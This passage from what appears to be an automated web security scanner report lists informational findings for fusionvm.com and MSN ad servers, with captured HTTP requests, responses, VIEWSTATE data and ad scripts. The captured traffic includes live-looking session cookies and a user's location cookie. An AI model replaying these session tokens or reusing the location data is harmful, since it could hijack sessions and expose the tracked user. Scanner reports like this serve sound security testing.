<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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
...[SNIP]...

Request 2

GET /FusionVM/DesktopDefault.aspx HTTP/1.1
Host: www.fusionvm.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=61526075.1303736107.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=61526075.1350494952.1303736107.1303736107.1303736107.1; ASPSESSIONIDQSSATBSQ=OACBHAADIBHEEHNBJFIKBAHA; CriticalWatch_WinMgmt=ee7a5594-6305-4caf-8e32-75811cf5c202; ASP.NET_SessionId=5nwmhdis5hnjwmmysd3y3vr0

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Tue, 26 Apr 2011 21:49:30 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Date: Tue, 26 Apr 2011 21:49:30 GMT
Content-Length: 34743


<html>
<head id="htmlHead">
</head>
<body onload="sClock();">
<form method="post" action="DesktopDefault.aspx" id="ctl00">
<div class="aspNetHidden">
<input type="hidden" name="__EVENTTARGET"
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="1eNrdW01sG8cVFilRliLbdGObceuUmriuf2KJXP5TtpWYomRLsaQooiQ7MQRlyB1y11rusrOzpNhDkf4eCxQoYrSHFg16aIui6KW3Ai3aU9A2/TkUaI8+9dSk6S/Qn/TN7FLkSnJkShQUhgY0u7PvvXnzvvfezJtdv+fx+31Do5FEJB5Pw7+oP+ANPrlIipSYygLWibZckTEjSsDr9fjlxt+iuOy1L69f6envcfr4n75Wmj4/l3hkRTXVvEYUOdDvPeLnT4JHscWMglGuaIQRX69RLMreoU3Gov+ELAd6ZO9x/wl/oC94JKuQwjqRS8MeRYafGLyv6KgEKgx6ejjdwCRm+Dapm4Ge4NDaMzOMlLOGpTNvLwzNyZ8Ack44NI+ragmmtkw1n6wwVrkaDtdqtRBXyWKE1gyqyfwubIYxZWpBI+GxaCQpSbHwEtnA5lpRBSutsZqxxkhBWSsoKimaa0aV0LU8JbigPM/whqEb5fqMPB5JBfuAjfkuCmYkmBEwI86MbGbEmZHNDHP0+k97TryA1XWrjClaUe/jOtb51GECw/2+j7+v1sNHfMeyrb0gsM9/2jsYD0eT4agUifzCs6QQZKuTY2AKxOkZNTSN0IugTLGoFghSHG1lpDITKQTL/BFS9aJBy5ipho5MUrCoyuoI1LOf6UbVfsR7+Ax1QzNKdVQE4UZN1UvwAMiwDBNmRGcIvAwjjeB1xBTMENmoGCYMmTMKKtZQrjGAbpXzhJr2QEwBa1XgNhQKyV6fY5a3PPdxFZsFqlbY1SoYrjYOA8pGLWRUiH7pXPimZYJmK3PhSWKuM6MyZ8iWRsxwY5B5UnPfrKikFsJmZeP5jKZic5wbvCiEVMsXlnAe4JUuzGK9NE700eXchReX4Z673szkeCSdSqTHzo2cOzeCztVUmSnjCUkaUYhaUpi4BE3BKHlMzfE6MUfALdRPEwzRwm/PXb4mPF7ElOO7MMeVFugBX4pDOmEhLR+uVcIZ21nNxvSce2cC9g0olkhF41LswrWsgnWIc+6iSfCZ+HIOWbQEpmcGqlADsGMIF5haVU2GTBW8pEiNMsoqgB74BgQlNR1fPQpeVCyiO2A3Qpt++tQjlIXRejM3F3bwywzScK2MQTQCF5ozdBnXG1qByy7rMIBs+6zJ9VR1kFslOnEpjSpGxdLAAdzq4yIQgy+jGji2Am2+bs9mNI+5yzlzQrhSwRRcU4OhKyYBgUImYapwbBgJsiSIA4uC6IyK7hC1RtQQ4hYtkZBBSx9wvxyL7t8vvS6/fNPjYE1NM1QkRDYrBmVYExmpEI7HouFiOBGT0lIU0moknpTHkoVYWAtLs1LOlcOsdWleyuowSynbSC9SNhZNJWNSJiFlDYrBj6UpUKsC/mFKU8yQpmzspKkSNayKNAVZQpqqYFZQCBBw88MY0lTV0nRCcV7VhFBpEnKTdBNUDpvMoHUpElJYGbxz4kUxCGqMwTG3R0BiAJGFHPHoBZDOp4lc0p3IODYFORU8mZhmuTU0go9K4dY6vwcdTswTWCToOrrDu9Fy7hFpHGxEwTWrxK3hum7UIAmb6OVb82iKKWoBsum0TXFLUPD0LhsQOhAJuIRVfcROviJHuycDcca7CDgteC/Ji3AahZBUwTRqmSAuBsaDIIKYcozHn8NAJQW0MMX8IdubBUg6MEJI6GXiusnJP+jhEutMuPAdy6krPV6+DRls7lDeg59/2Oc9JcPDpwOB4MkM7JBuEW5/RrKGZpV1Uwl+hKc90BnT+hymJVU3hy5/2zOjFykuQSJSC2boDskvz4SWNUYxXN6iqhzaxjSCWlniO/FUI1IoNoJWIBkC6zi/C4HDSfxvOj2CspbGLErGdWIBlzaCFqy8phZg97VkrBN9PCXLiUIskowVowVZKuQ9wZOLRi1HNMjOBjUnSRGDhKHL39xV+1a2Q1DcGzw9YVCZUABBw7AWbKr+rV1VdzMeivInTUIzfAkkWaJpOUYh8OTgmWnYyYFmwLvOnxr65qx2d6dtvIcysTN
...[SNIP]...

18.6. https://www.fusionvm.com/FusionVM/DesktopModules/SecurityAdvisories/SecurityAdvisoriesView.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.fusionvm.com
Path:   /FusionVM/DesktopModules/SecurityAdvisories/SecurityAdvisoriesView.aspx

Request 1

GET /FusionVM/DesktopModules/SecurityAdvisories/SecurityAdvisoriesView.aspx?Alias=www.fusionvm&TabId=0&Lang=en-US&OU=0&ItemId=35715 HTTP/1.1
Host: www.fusionvm.com
Connection: keep-alive
Referer: https://www.fusionvm.com/FusionVM/DesktopDefault.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=61526075.1303736107.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=61526075.1350494952.1303736107.1303736107.1303736107.1; ASPSESSIONIDQSSATBSQ=OACBHAADIBHEEHNBJFIKBAHA; CriticalWatch_WinMgmt=ee7a5594-6305-4caf-8e32-75811cf5c202; ASP.NET_SessionId=5nwmhdis5hnjwmmysd3y3vr0

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Tue, 26 Apr 2011 21:52:54 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Date: Tue, 26 Apr 2011 21:52:54 GMT
Content-Length: 16812


<HTML>
<head id="htmlHead">
</HEAD>
   <body>
       <form method="post" action="SecurityAdvisoriesView.aspx?Alias=www.fusionvm&amp;TabId=0&amp;Lang=en-US&amp;OU=0&amp;ItemId=35715" id="ctl00">
<div cla
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTQwNzQyMTM1MQ8WAh4LVXJsUmVmZXJyZXIFNWh0dHBzOi8vd3d3LmZ1c2lvbnZtLmNvbS9GdXNpb25WTS9EZXNrdG9wRGVmYXVsdC5hc3B4FgICAQ9kFgoCAQ8PFgIeBFRleHQFekhQU0JNQTAyNjY2IFNTUlQxMDA0MzQgcmV2LjEgOiBIUCBOZXR3b3JrIEF1dG9tYXRpb24gUnVubmluZyBvbiBMaW51eCwgU29sYXJpcywgYW5kIFdpbmRvd3MsIFJlbW90ZSBJbmZvcm1hdGlvbiBEaXNjbG9zdXJlZGQCAw8PFgIfAQUPSGV3bGV0dC1QYWNrYXJkZGQCBQ8PFgIfAQUJNC8yNi8yMDExZGQCBw8PFgIfAQUJNC8yNi8yMDExZGQCCQ8PFgIfAQX1Ly0tLS0tQkVHSU4gUEdQIFNJR05FRCBNRVNTQUdFLS0tLS0KSGFzaDogU0hBMQoKU1VQUE9SVCBDT01NVU5JQ0FUSU9OIC0gU0VDVVJJVFkgQlVMTEVUSU4KCkRvY3VtZW50IElEOiBjMDI3ODk1MTQKVmVyc2lvbjogMQoKSFBTQk1BMDI2NjYgU1NSVDEwMDQzNCByZXYuMSAtIEhQIE5ldHdvcmsgQXV0b21hdGlvbiBSdW5uaW5nIG9uIExpbnV4LCBTb2xhcmlzLCBhbmQgV2luZG93cywgUmVtb3RlIEluZm9ybWF0aW9uIApEaXNjbG9zdXJlCgpOT1RJQ0U6IFRoZSBpbmZvcm1hdGlvbiBpbiB0aGlzIFNlY3VyaXR5IEJ1bGxldGluIHNob3VsZCBiZSBhY3RlZCB1cG9uIGFzIHNvb24gYXMgcG9zc2libGUuCgpSZWxlYXNlIERhdGU6IDIwMTEtMDQtMjEKTGFzdCBVcGRhdGVkOiAyMDExLTA0LTIxCgpQb3RlbnRpYWwgU2VjdXJpdHkgSW1wYWN0OiBSZW1vdGUgaW5mb3JtYXRpb24gZGlzY2xvc3VyZQoKU291cmNlOiBIZXdsZXR0LVBhY2thcmQgQ29tcGFueSwgSFAgU29mdHdhcmUgU2VjdXJpdHkgUmVzcG9uc2UgVGVhbQoKVlVMTkVSQUJJTElUWSBTVU1NQVJZCkEgcG90ZW50aWFsIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdHkgaGFzIGJlZW4gaWRlbnRpZmllZCB3aXRoIEhQIE5ldHdvcmsgQXV0b21hdGlvbiBydW5uaW5nIG9uIExpbnV4LCBTb2xhcmlzLCBhbmQgCldpbmRvd3MuIFRoaXMgdnVsbmVyYWJpbGl0eSBjb3VsZCBiZSBleHBsb2l0ZWQgcmVtb3RlbHkgcmVzdWx0aW5nIGluIGluZm9ybWF0aW9uIGRpc2Nsb3N1cmUuCgpSZWZlcmVuY2VzOiBDVkUtMjAxMS0xNzI1CgpTVVBQT1JURUQgU09GVFdBUkUgVkVSU0lPTlMqOiBPTkxZIGltcGFjdGVkIHZlcnNpb25zIGFyZSBsaXN0ZWQuCkhQIE5ldHdvcmsgQXV0b21hdGlvbiB2Ny4yeCwgdjcuNXgsIHY3LjZ4LCB2OS4wLCB2OS4xMAoKQkFDS0dST1VORAoKQ1ZTUyAyLjAgQmFzZSBNZXRyaWNzCiYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOy
...[SNIP]...

Request 2

GET /FusionVM/DesktopModules/SecurityAdvisories/SecurityAdvisoriesView.aspx?Alias=www.fusionvm&TabId=0&Lang=en-US&OU=0&ItemId=35715 HTTP/1.1
Host: www.fusionvm.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=61526075.1303736107.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=61526075.1350494952.1303736107.1303736107.1303736107.1; ASPSESSIONIDQSSATBSQ=OACBHAADIBHEEHNBJFIKBAHA; CriticalWatch_WinMgmt=ee7a5594-6305-4caf-8e32-75811cf5c202; ASP.NET_SessionId=5nwmhdis5hnjwmmysd3y3vr0

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Tue, 26 Apr 2011 21:53:44 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Date: Tue, 26 Apr 2011 21:53:43 GMT
Content-Length: 16720


<HTML>
<head id="htmlHead">
</HEAD>
   <body>
       <form method="post" action="SecurityAdvisoriesView.aspx?Alias=www.fusionvm&amp;TabId=0&amp;Lang=en-US&amp;OU=0&amp;ItemId=35715" id="ctl00">
<div cla
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTQwNzQyMTM1MQ9kFgICAQ9kFgoCAQ8PFgIeBFRleHQFekhQU0JNQTAyNjY2IFNTUlQxMDA0MzQgcmV2LjEgOiBIUCBOZXR3b3JrIEF1dG9tYXRpb24gUnVubmluZyBvbiBMaW51eCwgU29sYXJpcywgYW5kIFdpbmRvd3MsIFJlbW90ZSBJbmZvcm1hdGlvbiBEaXNjbG9zdXJlZGQCAw8PFgIfAAUPSGV3bGV0dC1QYWNrYXJkZGQCBQ8PFgIfAAUJNC8yNi8yMDExZGQCBw8PFgIfAAUJNC8yNi8yMDExZGQCCQ8PFgIfAAX1Ly0tLS0tQkVHSU4gUEdQIFNJR05FRCBNRVNTQUdFLS0tLS0KSGFzaDogU0hBMQoKU1VQUE9SVCBDT01NVU5JQ0FUSU9OIC0gU0VDVVJJVFkgQlVMTEVUSU4KCkRvY3VtZW50IElEOiBjMDI3ODk1MTQKVmVyc2lvbjogMQoKSFBTQk1BMDI2NjYgU1NSVDEwMDQzNCByZXYuMSAtIEhQIE5ldHdvcmsgQXV0b21hdGlvbiBSdW5uaW5nIG9uIExpbnV4LCBTb2xhcmlzLCBhbmQgV2luZG93cywgUmVtb3RlIEluZm9ybWF0aW9uIApEaXNjbG9zdXJlCgpOT1RJQ0U6IFRoZSBpbmZvcm1hdGlvbiBpbiB0aGlzIFNlY3VyaXR5IEJ1bGxldGluIHNob3VsZCBiZSBhY3RlZCB1cG9uIGFzIHNvb24gYXMgcG9zc2libGUuCgpSZWxlYXNlIERhdGU6IDIwMTEtMDQtMjEKTGFzdCBVcGRhdGVkOiAyMDExLTA0LTIxCgpQb3RlbnRpYWwgU2VjdXJpdHkgSW1wYWN0OiBSZW1vdGUgaW5mb3JtYXRpb24gZGlzY2xvc3VyZQoKU291cmNlOiBIZXdsZXR0LVBhY2thcmQgQ29tcGFueSwgSFAgU29mdHdhcmUgU2VjdXJpdHkgUmVzcG9uc2UgVGVhbQoKVlVMTkVSQUJJTElUWSBTVU1NQVJZCkEgcG90ZW50aWFsIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdHkgaGFzIGJlZW4gaWRlbnRpZmllZCB3aXRoIEhQIE5ldHdvcmsgQXV0b21hdGlvbiBydW5uaW5nIG9uIExpbnV4LCBTb2xhcmlzLCBhbmQgCldpbmRvd3MuIFRoaXMgdnVsbmVyYWJpbGl0eSBjb3VsZCBiZSBleHBsb2l0ZWQgcmVtb3RlbHkgcmVzdWx0aW5nIGluIGluZm9ybWF0aW9uIGRpc2Nsb3N1cmUuCgpSZWZlcmVuY2VzOiBDVkUtMjAxMS0xNzI1CgpTVVBQT1JURUQgU09GVFdBUkUgVkVSU0lPTlMqOiBPTkxZIGltcGFjdGVkIHZlcnNpb25zIGFyZSBsaXN0ZWQuCkhQIE5ldHdvcmsgQXV0b21hdGlvbiB2Ny4yeCwgdjcuNXgsIHY3LjZ4LCB2OS4wLCB2OS4xMAoKQkFDS0dST1VORAoKQ1ZTUyAyLjAgQmFzZSBNZXRyaWNzCiYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsmIzYxOyYjNjE7JiM2MTsKICBSZWZlcmVuY2UgICAgICAgICAgICAgIEJhc2UgVmVjdG9yICAgICAgIC
...[SNIP]...

19. Cross-domain Referer leakage  previous  next
There are 143 instances of this issue:


19.1. http://a.rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&ID=B506C07761D7465D924574124E3C14DF&MUID=B506C07761D7465D924574124E3C14DF&PG=INVIVF&AP=1025 HTTP/1.1
Host: a.rad.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC07=FB=; FC08=FB=; FC09=FB=; MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; FC06=FB=AgEAtw4Q67gB; FC01=FB=AgEAtw5ZB7gB; Sample=37

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 840
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8604309-T41577416-C42000000000039122
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:39:54 GMT
Content-Length: 840


//<![CDATA[
function getRADIds() { return{"adid":"42000000000039122","pid":"8604309","targetid":"41577416"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 120, 30);}
t
...[SNIP]...
<a href="http://g.msn.com/2AD0004C/42000000000039122.1??PID=8604309&amp;UIT=G&amp;TargetID=41577416&amp;AN=404425104&amp;PG=INVIVF&amp;ASID=ebca991a88e14683ab78cb39388a3421" target="_blank"><img src="http://a.ads2.msads.net/CIS/86/000/000/000/001/971.gif" width="120" height="30" alt="Click Here!" border="0" /></a>
...[SNIP]...

19.2. http://a.rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&ID=B506C07761D7465D924574124E3C14DF&MUID=B506C07761D7465D924574124E3C14DF&PG=REAR01&AP=1089 HTTP/1.1
Host: a.rad.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC07=FB=; FC08=FB=; FC09=FB=; MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; FC01=FB=AgEAtg5ZB7AB; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; FC06=FB=AgEAtw4Q67gB; Sample=37

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2313
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: FC01=FB=AgEAtw5ZB7gB; expires=Thu, 25-Apr-2013 12:00:00 GMT; domain=.rad.msn.com; path=/; HttpOnly
X-RADID: P8596567-T44582830-C59000000000042124
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:39:19 GMT
Content-Length: 2313


//<![CDATA[
function getRADIds() { return{"adid":"59000000000042124","pid":"8596567","targetid":"44582830"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 250);if(pare
...[SNIP]...
<!-- Iframe/JavaScript -->\n');adCode_1394099180.push('<iframe src="http://altfarm.mediaplex.com/ad/fm/76315?mpt=[1394099180ER]&mpt2=[1394099180ER]&mpvc=" width=300 height=250 marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no bordercolor="#000000">\n');adCode_1394099180.push(' <scr'+'ipt type="text/javascript" src="http://altfarm.mediaplex.com/ad/!js/76315?mpt=[1394099180ER]&mpt2=[1394099180ER]&mpvc=">
...[SNIP]...

19.3. http://a.rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&ID=B506C07761D7465D924574124E3C14DF&MUID=B506C07761D7465D924574124E3C14DF&PG=INV4QA&AP=1026 HTTP/1.1
Host: a.rad.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=; MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; FC01=FB=AgEAtg5ZB7AB; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; Sample=37

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 843
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8031632-T8247108-C107000000000049234
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:35:56 GMT
Content-Length: 843


//<![CDATA[
function getRADIds() { return{"adid":"107000000000049234","pid":"8031632","targetid":"8247108"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 120, 60);}
t
...[SNIP]...
<a href="http://g.msn.com/2AD0004E/107000000000049234.1??PID=8031632&amp;UIT=G&amp;TargetID=8247108&amp;AN=1260014312&amp;PG=INV4QA&amp;ASID=bd01262a58d5488b9395a1b052787be9" target="_blank"><img src="http://a.ads2.msads.net/CIS/49/000/000/000/015/280.gif" width="120" height="60" alt="Click Here!" border="0" /></a>
...[SNIP]...

19.4. http://a.rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&ID=B506C07761D7465D924574124E3C14DF&MUID=B506C07761D7465D924574124E3C14DF&PG=INVHP1&AP=1089 HTTP/1.1
Host: a.rad.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
